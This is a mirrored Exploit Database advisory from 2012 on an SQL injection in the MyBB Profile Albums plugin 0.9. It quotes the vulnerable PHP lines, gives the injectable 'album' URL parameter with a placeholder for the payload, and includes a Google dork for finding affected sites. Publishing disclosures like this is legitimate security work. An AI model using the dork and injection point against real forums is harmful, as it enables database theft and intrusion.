MyBB Profile Albums Plugin 0.9 – ‘albums.php?album’ SQL Injection

Exploit Database
11 阅读

作者： Zixem

日期： 2012-10-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/22003/

# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within albums.php :

	<?
		/*Line 69*/	$aid = $mybb->input['album']; 
		/*Line 86*/	$query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'");
	?>

/albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Image : http://i.imgur.com/yeAx0.png


Follow: https://twitter.com/PonyBlaze

last Exploits
MyBB Profile Albums Plugin 0.9 – ‘albums.php?album’ SQL Injection的更多信息

WordPress Plugin File Groups 1.1.2 – SQL Injection：
SonicDICOM PACS 2.3.2 – Cross-Site Scripting：
phpCheckZ 1.1.0 – Blind SQL Injection：
Groupon Clone Script 3.01 – ‘state_id’ / ‘search’ SQL Injection：
PHP iReport 1.0 – Remote Html Code Injection：
WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 – SQL-Injection (Unauthenticated)：
WordPress Plugin Ultimate WordPress Auction Plugin 1.0 – Cross-Site Request Forgery：
TinyCMS 1.3 – Arbitrary File Upload / Cross-Site Request Forgery：